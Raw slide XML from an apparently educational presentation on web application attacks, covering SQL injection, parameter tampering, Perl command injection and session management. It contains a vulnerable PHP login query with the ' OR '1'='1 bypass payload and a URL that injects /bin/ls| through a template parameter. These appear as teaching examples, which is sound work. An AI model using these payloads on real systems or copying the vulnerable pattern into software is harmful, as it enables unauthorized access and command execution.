              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>SQL Injection attacking example 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="461812">
            <a:off x="6172200" y="1676400"/>
            <a:ext cx="2286000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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SQL Inject Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6003463" y="1462078"/>
            <a:ext cx="611659" cy="195058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rot="20868517">
            <a:off x="4663824" y="5558388"/>
            <a:ext cx="2895600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 49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table data destroy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5469604" y="4969797"/>
            <a:ext cx="686743" cy="50074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t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$query = "SELECT * FROM users WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>          users= ' {$_POST['username']} ' AND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>       password= ' {$_POST['password']} ' ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mysql_query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>//$_POST['username'] = 'bob';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>//$_POST['password'] = " ' OR '1'='1 ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>echo $query;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>              WHERE user='bob' AND password=' ' OR '1'='1'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="762000"/>
            <a:ext cx="6324600" cy="655638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>SQL Injection attacking example 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21036270">
            <a:off x="6096000" y="2743200"/>
            <a:ext cx="2057400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 41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Inject Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4191000" y="3139734"/>
            <a:ext cx="1918800" cy="3654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Parameter tampering is a sophisticated form of hacking that creates a change in the Uniform Resource Locator, or URL, associated with a web page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Essentially, parameter tampering makes it possible for the hacker  to gain access to any information entered by an end user on an effected web page, and redirect it to the hacker for unauthorized use. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>This type of hacking activity is often employed to gain access to personal information such as credit card numbers, government issued identification numbers, and other data that is of a proprietary nature. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"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Parameter Tampering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2"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solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>What is a Web Application?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Any application that is served commonly via http or https protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Usually being served from a remote computer acting as a host/server</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563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Parameter Tampering -Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="C:\Documents and Settings\sbargad\Desktop\izhar\jpg\pic15.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="838200"/>
            <a:ext cx="9144000" cy="6019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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Parameter Tampering - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="C:\Documents and Settings\sbargad\Desktop\izhar\jpg\pic16.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="838200"/>
            <a:ext cx="9143999" cy="6019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OS Commanding is an attack technique used for unauthorized execution of operating system commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>This attack is possible when an application accepts untrusted input to build operating system commands in an insecure manner involving improper data sanitization, and/or improper calling of external programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>In OS Commanding, executed commands by an attacker will run with the same privileges of the component that executed the command, (e.g. database server, web application server, web server, application). Since the commands are executed under the privileges of the executing component an attacker can leverage this to gain access or damage parts that are otherwise unreachable (e.g. the operating system directories and files).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"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Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-7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a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> function is part of the API Perl provides for file handling. Improper use of this function may result in OS Commanding since Perl allows piping data from a process into an open statement, by appending a '|' (Pipe) character onto the end of a filename.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># The code below executes "/bin/ls" and pipe the output to the open statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open FILE, "/bin/ls|" or die $!;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Web applications often include parameters that specify a file that is displayed or used as a template. Without proper input validation, an attacker may change the parameter value to include a shell command followed by the pipe symbol, shown above.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>If the original URL of the web application is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example/cgi-bin/showInfo.pl?name=John&amp;template=tmp1.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Changing the template parameter value, the attacker can trick the web application into executing the command /bin/ls:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example /cgi-bin/showInfo.pl?name=John&amp;template=/bin/ls|</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="411162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Command Injection Perl - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalu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In human-computer interaction, session management is the process of keeping track of a user's activity across sessions of interaction with the computer system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>HTTP/s Protocol does not provide tracking of a users session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Session tracking answers the question:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>After a user authenticates how does the server associate subsequent requests to the authenticated user?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Typically, Web Application Vendors provide a built-in session tracking, which is good if used properly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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a:rPr>
              <a:t>Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalu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70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>URL Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The session token is part of the URL and will be transmitted to the web  	server through HTTP GET requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>		Example: 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	http://www.blabla.com/buy.asp?article=27781;sessionid=IE5579901578</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Hidden Form Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>It is one of the way to maintain the session. In hidden form fields 	 the 	html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>entry will be like this :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;INPUT TYPE="hidden" NAME="user"VALUE="Jennifer"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>		This means that when you submit the form, the specified name  and value will be 	get included in get or post method. In this session ID  information would be 	embedded within the form as a hidden field and submitted with the http post 	command. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cookies are a simple session management mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>		The cookie is sent as an HTTP header by a web server to a web browser and 	then sent back unchanged by the browser each time it accesses that server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP format is Set-Cookie: cookie-value </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="411162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Session Management Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalu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lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Replay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Tempering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="487362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Session Management Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalu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Many Web applications use cookies to save information (user IDs, passwords, account numbers, time stamps, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
